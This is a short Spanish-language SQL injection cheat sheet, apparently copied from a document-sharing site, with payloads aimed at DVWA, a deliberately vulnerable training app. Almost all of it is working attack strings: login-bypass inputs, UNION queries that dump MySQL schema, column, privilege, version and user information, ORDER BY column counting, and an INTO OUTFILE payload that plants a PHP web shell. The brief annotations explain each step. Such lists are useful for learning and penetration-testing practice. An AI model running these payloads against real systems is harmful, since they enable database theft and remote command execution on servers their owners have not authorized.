Documentos de Académico
Documentos de Profesional
Documentos de Cultura
admin'--
'OR''=''--
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
>>>>>>>>>>>>>>>>>>>>>>
MySQL :
Listar tablas que maneja este servidor de MySQL (prestar atencion a la notacion
instancia.tabla porque la aplicacion esta usando otra instancia normalmente)
' union all select table_schema, table_name, column_name FROM
information_schema.columns WHERE table_schema != 'mysql' AND table_schema !=
'information_schema'
----> Listar columnas de la base de datos actual (la de la aplicacion vulnerable)
SI es que se puede listar el information_schema. Filtra las columnas no deseadas.
' union all select column_name from information_schema.columns where table_schema =
'dvwa' and table_name = 'users'; ----> Igual que el anterior.
' union all SELECT grantee,privilege_type FROM information_schema.user_privileges;
-- ---> Listar privilegios sobre tablas
' UNION SELECT 'test','123' INTO OUTFILE 'testing1.txt ----> Crear el archivo en
/var/lib/mysql/dvwa/
a' UNION ALL SELECT null,@@version;# ----> mysql version
a' UNION SELECT null,database() # ----> base de datos del programa
a' UNION ALL SELECT system_user(),user();# ----> usuario corriendo el engine
' UNION SELECT '', '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/tmp/shell.php';#
-----> Shell upload, no funciona siempre porque el usuario mysql requiere derechos
sobre el directorio donde se grabe y ese directorio debe ser accesable por el web
Otros como ORDER BY :
1' ORDER BY 3;# ---> En la app modelo da error y se puede conocer asi la cantidad
de columnas en el query de la app'